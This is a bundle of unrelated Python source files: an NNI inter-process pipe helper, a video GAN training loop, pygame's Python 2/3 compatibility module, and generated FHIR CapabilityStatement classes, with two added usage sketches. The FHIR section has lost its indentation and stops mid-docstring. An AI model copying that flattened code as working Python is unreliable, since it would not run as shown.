from io import BufferedIOBase
import os
import sys

if sys.platform == 'win32':
    import _winapi
    import msvcrt

    class WindowsPipe:
        def __init__(self, experiment_id: str):
            self.path: str = r'\\.\pipe\nni-' + experiment_id
            self.file = None
            self._handle = _winapi.CreateNamedPipe(
                self.path,
                _winapi.PIPE_ACCESS_DUPLEX,
                _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE | _winapi.PIPE_WAIT,
                1,
                8192,
                8192,
                0,
                _winapi.NULL
            )

        def connect(self) -> BufferedIOBase:
            _winapi.ConnectNamedPipe(self._handle, _winapi.NULL)
            fd = msvcrt.open_osfhandle(self._handle, 0)
            self.file = os.fdopen(fd, 'w+b')
            return self.file

        def close(self) -> None:
            if self.file is not None:
                self.file.close()

    Pipe = WindowsPipe

else:
    import socket
    from . import management

    class UnixPipe:
        def __init__(self, experiment_id: str):
            self.path: str = str(management.create_experiment_directory(experiment_id) / 'dispatcher-pipe')
            self.file = None
            self._socket = socket.socket(socket.AF_UNIX)
            self._socket.bind(self.path)
            self._socket.listen(1)  # only accepts one connection

        def connect(self) -> BufferedIOBase:
            conn, _ = self._socket.accept()
            self.file = conn.makefile('rwb')
            return self.file

        def close(self) -> None:
            if self.file is not None:
                self.file.close()
            self._socket.close()
            os.unlink(self.path)

    Pipe = UnixPipe
Source file: nni/experiment/pipe.py
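The Pipe class above exposes a small create/connect/close API around a Windows named pipe or a Unix domain socket. The sketch below shows one plausible way to use it, assuming the module is importable as nni.experiment.pipe (matching the source path) and using a placeholder experiment id; connect() blocks until the dispatcher side opens the pipe, so this is illustrative rather than a drop-in test.

# Hypothetical usage sketch for the Pipe class above; the import path and the
# experiment id 'example0' are assumptions, not taken from this file.
from nni.experiment.pipe import Pipe

def serve_one_message(experiment_id: str) -> bytes:
    """Wait for a single peer connection and echo back the first line received."""
    pipe = Pipe(experiment_id)      # creates the named pipe / unix socket endpoint
    try:
        file = pipe.connect()       # blocks until the peer connects
        data = file.readline()      # read one message from the peer
        file.write(data)            # echo it back
        file.flush()
        return data
    finally:
        pipe.close()                # closes the file and tears down the endpoint

if __name__ == '__main__':
    print(serve_one_message('example0'))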
import os

import scipy.misc
import torch
import numpy as np
import torch.optim as optim

import config
import data_loader
import d_net
import loss_funs
import g_net

dtype = config.dtype


def save_samples(generated_images, iteration, prefix):
    # Tile a batch of CHW images into one HWC grid and write it to disk.
    generated_images = generated_images.data.cpu().numpy()
    num_images, channels, cell_h, cell_w = generated_images.shape
    ncols = int(np.sqrt(num_images))
    nrows = int(np.math.floor(num_images / float(ncols)))
    result = np.zeros(
        (cell_h * nrows, cell_w * ncols, channels), dtype=generated_images.dtype
    )
    for i in range(0, nrows):
        for j in range(0, ncols):
            result[
                i * cell_h : (i + 1) * cell_h, j * cell_w : (j + 1) * cell_w, :
            ] = generated_images[i * ncols + j].transpose(1, 2, 0)
    grid = result
    if not os.path.exists("output"):
        os.makedirs("output")
    scipy.misc.imsave("output/{}_{:05d}.jpg".format(prefix, iteration), grid)


def main():
    loss_fp = open("losses.csv", "w")

    video_d_net = d_net.DiscriminatorModel(
        kernel_sizes_list=d_net.SCALE_KERNEL_SIZES_D,
        conv_layer_fms_list=d_net.SCALE_CONV_FMS_D,
        scale_fc_layer_sizes_list=d_net.SCALE_FC_LAYER_SIZES_D,
    )
    video_d_net.type(dtype)

    video_g_net = g_net.VideoGANGenerator()
    video_g_net.type(dtype)

    video_d_optimizer = optim.SGD(video_d_net.parameters(), lr=0.0001)
    video_g_optimizer = optim.SGD(video_g_net.parameters(), lr=0.0001)

    # Load Pacman dataset
    max_size = len(os.listdir("train"))
    pacman_dataloader = data_loader.DataLoader("train", max_size, 16, 32, 32, 4)

    count = 0
    for i in range(1, 5000):
        clips_x, clips_y = pacman_dataloader.get_train_batch()
        clips_x = torch.tensor(np.rollaxis(clips_x, 3, 1)).type(dtype)
        clips_y = torch.tensor(np.rollaxis(clips_y, 3, 1)).type(dtype)

        video_d_optimizer.zero_grad()
        video_g_optimizer.zero_grad()

        # batch_size x noise_size x 1 x 1
        batch_size = 16

        # WGAN loss
        # https://github.com/keras-team/keras-contrib/blob/master/examples/improved_wgan.py
        video_images = video_g_net(clips_x)

        # TESTING: Vanilla Video Gan
        # Note: these two LSGAN-style losses are reassigned below via adv_loss
        # before any backward pass, so they are effectively placeholders.
        video_d_loss_real = (video_d_net(clips_y) - 1).pow(2).mean()
        video_d_loss_fake = (video_d_net(video_images)).pow(2).mean()

        # Fake batch
        labels = torch.zeros(batch_size, 4).t().unsqueeze(2).type(dtype)
        video_d_loss_fake = loss_funs.adv_loss(
            video_d_net(video_images), labels
        )  # TODO: Validate if it's right.
        video_d_optimizer.zero_grad()
        video_d_loss_fake.backward()
        video_d_optimizer.step()

        # Real batch
        labels = torch.ones(batch_size, 4).t().unsqueeze(2).type(dtype)
        video_d_loss_real = loss_funs.adv_loss(
            video_d_net(clips_y), labels
        )  # TODO: Validate if it's right.
        video_d_optimizer.zero_grad()
        video_d_loss_real.backward()
        video_d_optimizer.step()

        # batch_size x noise_size x 1 x 1
        batch_size = 16

        # print('G_Time:', end - start)

        # TESTING: Vanilla Video Gan
        video_images = video_g_net(clips_x)
        d_preds = video_d_net(video_images).type(
            dtype
        )  # TODO: Make sure this is working.
        gt_frames = clips_y.type(dtype)  # TODO: make clips_y at different scales.
        gen_frames = video_images.type(
            dtype
        )  # TODO: make the generated frames multi scale.
        video_g_loss = loss_funs.combined_loss(gen_frames, gt_frames, d_preds)
        video_g_loss.backward()
        video_g_optimizer.step()

        # Log losses and checkpoint every 20 iterations.
        if count % 20 == 0:
            save_samples(clips_y, count, "video_real")
            save_samples(video_images, count, "video_fake")

            out_str = "{}, {}, {}, {}".format(
                count, video_d_loss_real, video_d_loss_fake, video_g_loss
            )
            print(out_str)
            loss_fp.write(out_str)
            loss_fp.write("\n")
            loss_fp.flush()

            torch.save(video_g_net.state_dict(), "generator_net.pth.tmp")

        count += 1

    loss_fp.close()

    # Final Generator save.
    torch.save(video_g_net.state_dict(), "generator_net.pth")


if __name__ == "__main__":
    main()
Source file: process.py
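The training loop above leans on loss_funs.adv_loss and loss_funs.combined_loss, neither of which appears in this listing. The sketch below is only an assumption about what an adversarial loss with that call shape could look like, here binary cross-entropy against 0/1 labels; it is not the project's actual loss_funs implementation, and the tensor shapes are placeholders.

# Illustrative sketch only: a BCE-style adversarial loss with the same call shape as
# loss_funs.adv_loss(preds, labels) used above. The real loss_funs module is not shown
# in this listing, so this is an assumed interface, not the project's implementation.
import torch
import torch.nn.functional as F

def adv_loss_sketch(preds: torch.Tensor, labels: torch.Tensor) -> torch.Tensor:
    """Binary cross-entropy between discriminator outputs in (0, 1) and 0/1 labels."""
    return F.binary_cross_entropy(preds, labels)

if __name__ == "__main__":
    preds = torch.rand(16, 1)                                  # stand-in for video_d_net(...) outputs
    print(adv_loss_sketch(preds, torch.ones(16, 1)).item())    # "real" targets
    print(adv_loss_sketch(preds, torch.zeros(16, 1)).item())   # "fake" targets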
# coding: ascii
"""Python 2.x/3.x compatibility tools"""

import sys

__all__ = ['geterror', 'long_', 'xrange_', 'ord_', 'unichr_',
           'unicode_', 'raw_input_', 'as_bytes', 'as_unicode',
           'bytes_', 'imap_', 'PY_MAJOR_VERSION']

PY_MAJOR_VERSION = sys.version_info[0]


def geterror():
    return sys.exc_info()[1]


# Python 3
if PY_MAJOR_VERSION >= 3:
    long_ = int
    xrange_ = range
    from io import StringIO
    from io import BytesIO
    unichr_ = chr
    unicode_ = str
    bytes_ = bytes
    raw_input_ = input
    imap_ = map

    # Represent escaped bytes and strings in a portable way.
    #
    # as_bytes: Allow a Python 3.x string to represent a bytes object.
    #   e.g.: as_bytes("a\x01b") == b"a\x01b"  # Python 3.x
    #         as_bytes("a\x01b") == "a\x01b"   # Python 2.x
    # as_unicode: Allow a Python "r" string to represent a unicode string.
    #   e.g.: as_unicode(r"Bo\u00F6tes") == u"Bo\u00F6tes"  # Python 2.x
    #         as_unicode(r"Bo\u00F6tes") == "Bo\u00F6tes"   # Python 3.x
    def as_bytes(string):
        """ '<binary literal>' => b'<binary literal>' """
        return string.encode('latin-1', 'strict')

    def as_unicode(rstring):
        """ r'<Unicode literal>' => '<Unicode literal>' """
        return rstring.encode('ascii', 'strict').decode('unicode_escape',
                                                        'strict')

# Python 2
else:
    long_ = long
    xrange_ = xrange
    from cStringIO import StringIO
    BytesIO = StringIO
    unichr_ = unichr
    unicode_ = unicode
    bytes_ = str
    raw_input_ = raw_input
    from itertools import imap as imap_

    # Represent escaped bytes and strings in a portable way.
    #
    # as_bytes: Allow a Python 3.x string to represent a bytes object.
    #   e.g.: as_bytes("a\x01b") == b"a\x01b"  # Python 3.x
    #         as_bytes("a\x01b") == "a\x01b"   # Python 2.x
    # as_unicode: Allow a Python "r" string to represent a unicode string.
    #   e.g.: as_unicode(r"Bo\u00F6tes") == u"Bo\u00F6tes"  # Python 2.x
    #         as_unicode(r"Bo\u00F6tes") == "Bo\u00F6tes"   # Python 3.x
    def as_bytes(string):
        """ '<binary literal>' => '<binary literal>' """
        return string

    def as_unicode(rstring):
        """ r'<Unicode literal>' => u'<Unicode literal>' """
        return rstring.decode('unicode_escape', 'strict')


def get_BytesIO():
    return BytesIO


def get_StringIO():
    return StringIO


def ord_(o):
    try:
        return ord(o)
    except TypeError:
        return o


if sys.platform == 'win32':
    filesystem_errors = "replace"
elif PY_MAJOR_VERSION >= 3:
    filesystem_errors = "surrogateescape"
else:
    filesystem_errors = "strict"


def filesystem_encode(u):
    fsencoding = sys.getfilesystemencoding()
    if fsencoding.lower() in ['ascii', 'ansi_x3.4-1968'] and sys.platform.startswith('linux'):
        # Don't believe Linux systems claiming ASCII-only filesystems. In
        # practice, arbitrary bytes are allowed, and most things expect UTF-8.
        fsencoding = 'utf-8'
    return u.encode(fsencoding, filesystem_errors)
Source file: Python_MiniGame_Fighter/venv/Lib/site-packages/pygame/compat.py
from .fhirbase import fhirbase
class CapabilityStatement(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
resourceType: This is a CapabilityStatement resource
url: An absolute URI that is used to identify this capability
statement when it is referenced in a specification, model, design or
an instance. This SHALL be a URL, SHOULD be globally unique, and
SHOULD be an address at which this capability statement is (or will
be) published. The URL SHOULD include the major version of the
capability statement. For more information see [Technical and Business
Versions](resource.html#versions).
version: The identifier that is used to identify this version of the
capability statement when it is referenced in a specification, model,
design or instance. This is an arbitrary value managed by the
capability statement author and is not expected to be globally unique.
For example, it might be a timestamp (e.g. yyyymmdd) if a managed
version is not available. There is also no expectation that versions
can be placed in a lexicographical sequence.
name: A natural language name identifying the capability statement.
This name should be usable as an identifier for the module by machine
processing applications such as code generation.
title: A short, descriptive, user-friendly title for the capability
statement.
status: The status of this capability statement. Enables tracking the
life-cycle of the content.
experimental: A boolean value to indicate that this capability
statement is authored for testing purposes (or
education/evaluation/marketing), and is not intended to be used for
genuine usage.
date: The date (and optionally time) when the capability statement
was published. The date must change if and when the business version
changes and it must change if the status code changes. In addition, it
should change when the substantive content of the capability statement
changes.
publisher: The name of the individual or organization that published
the capability statement.
contact: Contact details to assist a user in finding and communicating
with the publisher.
description: A free text natural language description of the
capability statement from a consumer's perspective. Typically, this is
used when the capability statement describes a desired rather than an
actual solution, for example as a formal expression of requirements as
part of an RFP.
useContext: The content was developed with a focus and intent of
supporting the contexts that are listed. These terms may be used to
assist with indexing and searching for appropriate capability
statement instances.
jurisdiction: A legal or geographic region in which the capability
statement is intended to be used.
purpose: Explanation of why this capability statement is needed and
why it has been designed as it has.
copyright: A copyright statement relating to the capability statement
and/or its contents. Copyright statements are generally legal
restrictions on the use and publishing of the capability statement.
kind: The way that this statement is intended to be used, to describe
an actual running instance of software, a particular product (kind not
instance of software) or a class of implementation (e.g. a desired
purchase).
instantiates: Reference to a canonical URL of another
CapabilityStatement that this software implements or uses. This
capability statement is a published API description that corresponds
to a business service. The rest of the capability statement does not
need to repeat the details of the referenced resource, but can do so.
software: Software that is covered by this capability statement. It
is used when the capability statement describes the capabilities of a
particular software version, independent of an installation.
implementation: Identifies a specific implementation instance that is
described by the capability statement - i.e. a particular
installation, rather than the capabilities of a software program.
fhirVersion: The version of the FHIR specification on which this
capability statement is based.
acceptUnknown: A code that indicates whether the application accepts
unknown elements or extensions when reading resources.
format: A list of the formats supported by this implementation using
their content types.
patchFormat: A list of the patch formats supported by this
implementation using their content types.
implementationGuide: A list of implementation guides that the server
does (or should) support in their entirety.
profile: A list of profiles that represent different use cases
supported by the system. For a server, "supported by the system" means
the system hosts/produces a set of resources that are conformant to a
particular profile, and allows clients that use its services to search
using this profile and to find appropriate data. For a client, it
means the system will search by this profile and process data
according to the guidance implicit in the profile. See further
discussion in [Using Profiles](profiling.html#profile-uses).
rest: A definition of the restful capabilities of the solution, if
any.
messaging: A description of the messaging capabilities of the
solution.
document: A document definition.
"""
__name__ = 'CapabilityStatement'
def __init__(self, dict_values=None):
self.resourceType = 'CapabilityStatement'
# type: str
# possible values: CapabilityStatement
self.url = None
# type: str
self.version = None
# type: str
self.name = None
# type: str
self.title = None
# type: str
self.status = None
# type: str
# possible values: draft, active, retired, unknown
self.experimental = None
# type: bool
self.date = None
# type: str
self.publisher = None
# type: str
self.contact = None
# type: list
# reference to ContactDetail
self.description = None
# type: str
self.useContext = None
# type: list
# reference to UsageContext
self.jurisdiction = None
# type: list
# reference to CodeableConcept
self.purpose = None
# type: str
self.copyright = None
# type: str
self.kind = None
# type: str
# possible values: instance, capability, requirements
self.instantiates = None
# type: list
self.software = None
# reference to CapabilityStatement_Software
self.implementation = None
# reference to CapabilityStatement_Implementation
self.fhirVersion = None
# type: str
self.acceptUnknown = None
# type: str
# possible values: no, extensions, elements, both
self.format = None
# type: list
self.patchFormat = None
# type: list
self.implementationGuide = None
# type: list
self.profile = None
# type: list
# reference to Reference: identifier
self.rest = None
# type: list
# reference to CapabilityStatement_Rest
self.messaging = None
# type: list
# reference to CapabilityStatement_Messaging
self.document = None
# type: list
# reference to CapabilityStatement_Document
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'draft', 'active', 'retired', 'unknown']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'draft, active, retired, unknown'))
if self.kind is not None:
for value in self.kind:
if value is not None and value.lower() not in [
'instance', 'capability', 'requirements']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'instance, capability, requirements'))
if self.acceptUnknown is not None:
for value in self.acceptUnknown:
if value is not None and value.lower() not in [
'no', 'extensions', 'elements', 'both']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'no, extensions, elements, both'))
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_Rest',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'rest'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'contact'},
{'parent_entity': 'CapabilityStatement_Software',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'software'},
{'parent_entity': 'CapabilityStatement_Implementation',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'implementation'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement',
'child_variable': 'profile'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'jurisdiction'},
{'parent_entity': 'CapabilityStatement_Document',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'document'},
{'parent_entity': 'CapabilityStatement_Messaging',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'messaging'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'useContext'},
]
class CapabilityStatement_Software(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: Name software is known by.
version: The version identifier for the software covered by this
statement.
releaseDate: Date this version of the software was released.
"""
__name__ = 'CapabilityStatement_Software'
def __init__(self, dict_values=None):
self.name = None
# type: str
self.version = None
# type: str
self.releaseDate = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
class CapabilityStatement_Implementation(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
description: Information about the specific installation that this
capability statement relates to.
url: An absolute base URL for the implementation. This forms the base
for REST interfaces as well as the mailbox and document interfaces.
"""
__name__ = 'CapabilityStatement_Implementation'
def __init__(self, dict_values=None):
self.description = None
# type: str
self.url = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
class CapabilityStatement_Rest(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Identifies whether this portion of the statement is describing
the ability to initiate or receive restful operations.
documentation: Information about the system's restful capabilities
that apply across all applications, such as security.
security: Information about security implementation from an interface
perspective - what a client needs to know.
resource: A specification of the restful capabilities of the solution
for a specific resource type.
interaction: A specification of restful operations supported by the
system.
searchParam: Search parameters that are supported for searching all
resources for implementations to support and/or make use of - either
references to ones defined in the specification, or additional ones
defined for/by the implementation.
operation: Definition of an operation or a named query together with
its parameters and their meaning and type.
compartment: An absolute URI which is a reference to the definition of
a compartment that the system supports. The reference is to a
CompartmentDefinition resource by its canonical URL.
"""
__name__ = 'CapabilityStatement_Rest'
def __init__(self, dict_values=None):
self.mode = None
# type: str
# possible values: client, server
self.documentation = None
# type: str
self.security = None
# reference to CapabilityStatement_Security
self.resource = None
# type: list
# reference to CapabilityStatement_Resource
self.interaction = None
# type: list
# reference to CapabilityStatement_Interaction1
self.searchParam = None
# type: list
# reference to CapabilityStatement_SearchParam
self.operation = None
# type: list
# reference to CapabilityStatement_Operation
self.compartment = None
# type: list
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'client', 'server']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'client, server'))
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_SearchParam',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'searchParam'},
{'parent_entity': 'CapabilityStatement_Interaction1',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'interaction'},
{'parent_entity': 'CapabilityStatement_Security',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'security'},
{'parent_entity': 'CapabilityStatement_Resource',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'resource'},
{'parent_entity': 'CapabilityStatement_Operation',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'operation'},
]
class CapabilityStatement_Security(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
cors: Server adds CORS headers when responding to requests - this
enables javascript applications to use the server.
service: Types of security services that are supported/required by the
system.
description: General description of how security works.
certificate: Certificates associated with security profiles.
"""
__name__ = 'CapabilityStatement_Security'
def __init__(self, dict_values=None):
self.cors = None
# type: bool
self.service = None
# type: list
# reference to CodeableConcept
self.description = None
# type: str
self.certificate = None
# type: list
# reference to CapabilityStatement_Certificate
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_Certificate',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Security',
'child_variable': 'certificate'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Security',
'child_variable': 'service'},
]
class CapabilityStatement_Certificate(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: Mime type for a certificate.
blob: Actual certificate.
"""
__name__ = 'CapabilityStatement_Certificate'
def __init__(self, dict_values=None):
self.type = None
# type: str
self.blob = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
class CapabilityStatement_Resource(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: A type of resource exposed via the restful interface.
profile: A specification of the profile that describes the solution's
overall support for the resource, including any constraints on
cardinality, bindings, lengths or other limitations. See further
discussion in [Using Profiles](profiling.html#profile-uses).
documentation: Additional information about the resource type used by
the system.
interaction: Identifies a restful operation supported by the solution.
versioning: This field is set to no-version to specify that the system
does not support (server) or use (client) versioning for this resource
type. If this has some other value, the server must at least correctly
track and populate the versionId meta-property on resources. If the
value is 'versioned-update', then the server supports all the
versioning features, including using e-tags for version integrity in
the API.
readHistory: A flag for whether the server is able to return past
versions as part of the vRead operation.
updateCreate: A flag to indicate that the server allows or needs to
allow the client to create new identities on the server (e.g. that is,
the client PUTs to a location where there is no existing resource).
Allowing this operation means that the server allows the client to
create new identities on the server.
conditionalCreate: A flag that indicates that the server supports
conditional create.
conditionalRead: A code that indicates how the server supports
conditional read.
conditionalUpdate: A flag that indicates that the server supports
conditional update.
conditionalDelete: A code that indicates how the server supports
conditional delete.
referencePolicy: A set of flags that defines how references are
supported.
searchInclude: A list of _include values supported by the server.
searchRevInclude: A list of _revinclude (reverse include) values
supported by the server.
searchParam: Search parameters for implementations to support and/or
make use of - either references to ones defined in the specification,
or additional ones defined for/by the implementation.
"""
__name__ = 'CapabilityStatement_Resource'
def __init__(self, dict_values=None):
self.type = None
# type: str
self.profile = None
# reference to Reference: identifier
self.documentation = None
# type: str
self.interaction = None
# type: list
# reference to CapabilityStatement_Interaction
self.versioning = None
# type: str
# possible values: no-version, versioned, versioned-update
self.readHistory = None
# type: bool
self.updateCreate = None
# type: bool
self.conditionalCreate = None
# type: bool
self.conditionalRead = None
# type: str
# possible values: not-supported, modified-since, not-match,
# full-support
self.conditionalUpdate = None
# type: bool
self.conditionalDelete = None
# type: str
# possible values: not-supported, single, multiple
self.referencePolicy = None
# type: list
# possible values: literal, logical, resolves, enforced, local
self.searchInclude = None
# type: list
self.searchRevInclude = None
# type: list
self.searchParam = None
# type: list
# reference to CapabilityStatement_SearchParam
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.versioning is not None:
for value in self.versioning:
if value is not None and value.lower() not in [
'no-version', 'versioned', 'versioned-update']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'no-version, versioned, versioned-update'))
if self.conditionalRead is not None:
for value in self.conditionalRead:
if value is not None and value.lower() not in [
'not-supported', 'modified-since', 'not-match', 'full-support']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'not-supported, modified-since, not-match, full-support'))
if self.conditionalDelete is not None:
for value in self.conditionalDelete:
if value is not None and value.lower() not in [
'not-supported', 'single', 'multiple']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'not-supported, single, multiple'))
if self.referencePolicy is not None:
for value in self.referencePolicy:
if value is not None and value.lower() not in [
'literal', 'logical', 'resolves', 'enforced', 'local']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'literal, logical, resolves, enforced, local'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Resource',
'child_variable': 'profile'},
{'parent_entity': 'CapabilityStatement_SearchParam',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Resource',
'child_variable': 'searchParam'},
{'parent_entity': 'CapabilityStatement_Interaction',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Resource',
'child_variable': 'interaction'},
]
class CapabilityStatement_Interaction(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: Coded identifier of the operation, supported by the system
resource.
documentation: Guidance specific to the implementation of this
operation, such as 'delete is a logical delete' or 'updates are only
allowed with version id' or 'creates permitted from pre-authorized
certificates only'.
"""
__name__ = 'CapabilityStatement_Interaction'
def __init__(self, dict_values=None):
self.code = None
# type: str
# possible values: read, vread, update, patch, delete,
# history-instance, history-type, create, search-type
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.code is not None:
for value in self.code:
if value is not None and value.lower() not in [
'read', 'vread', 'update', 'patch', 'delete', 'history-instance',
'history-type', 'create', 'search-type']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'read, vread, update, patch, delete, history-instance, '
'history-type, create, search-type'))
class CapabilityStatement_SearchParam(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the search parameter used in the interface.
definition: An absolute URI that is a formal reference to where this
parameter was first defined, so that a client can be confident of the
meaning of the search parameter (a reference to
[[[SearchParameter.url]]]).
type: The type of value a search parameter refers to, and how the
content is interpreted.
documentation: This allows documentation of any distinct behaviors
about how the search parameter is used. For example, text matching
algorithms.
"""
__name__ = 'CapabilityStatement_SearchParam'
def __init__(self, dict_values=None):
self.name = None
# type: str
self.definition = None
# type: str
self.type = None
# type: str
# possible values: number, date, string, token, reference,
# composite, quantity, uri
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.type is not None:
for value in self.type:
if value is not None and value.lower() not in [
'number', 'date', 'string', 'token', 'reference', 'composite',
'quantity', 'uri']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'number, date, string, token, reference, composite, quantity, uri'))
class CapabilityStatement_Interaction1(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of the operation, supported by the system.
documentation: Guidance specific to the implementation of this
operation, such as limitations on the kind of transactions allowed, or
information about how system-wide search is implemented.
"""
__name__ = 'CapabilityStatement_Interaction1'
def __init__(self, dict_values=None):
self.code = None
# type: str
# possible values: transaction, batch, search-system,
# history-system
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.code is not None:
for value in self.code:
if value is not None and value.lower() not in [
'transaction', 'batch', 'search-system', 'history-system']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'transaction, batch, search-system, history-system'))
class CapabilityStatement_Operation(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the operation or query. For an operation, this is
the name prefixed with $ and used in the URL. For a query, this is
the name used in the _query parameter when the query is called.
definition: Where the formal definition can be found.
"""
__name__ = 'CapabilityStatement_Operation'
def __init__(self, dict_values=None):
self.name = None
# type: str
self.definition = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Operation',
'child_variable': 'definition'},
]
class CapabilityStatement_Messaging(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
endpoint: An endpoint (network accessible address) to which messages
and/or replies are to be sent.
reliableCache: Length of the receiver's reliable messaging cache in
minutes (if a receiver) or how long the cache length on the receiver
should be (if a sender).
documentation: Documentation about the system's messaging capabilities
for this endpoint not otherwise documented by the capability
statement. For example, the process for becoming an authorized
messaging exchange partner.
supportedMessage: References to message definitions for messages this
system can send or receive.
event: A description of the solution's support for an event at this
end-point.
"""
__name__ = 'CapabilityStatement_Messaging'
def __init__(self, dict_values=None):
self.endpoint = None
# type: list
# reference to CapabilityStatement_Endpoint
self.reliableCache = None
# type: int
self.documentation = None
# type: str
self.supportedMessage = None
# type: list
# reference to CapabilityStatement_SupportedMessage
self.event = None
# type: list
# reference to CapabilityStatement_Event
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_Endpoint',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Messaging',
'child_variable': 'endpoint'},
{'parent_entity': 'CapabilityStatement_SupportedMessage',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Messaging',
'child_variable': 'supportedMessage'},
{'parent_entity': 'CapabilityStatement_Event',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Messaging',
'child_variable': 'event'},
]
class CapabilityStatement_Endpoint(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
protocol: A list of the messaging transport protocol(s) identifiers,
supported by this endpoint.
address: The network address of the end-point. For solutions that do
not use network addresses for routing, it can be just an identifier.
"""
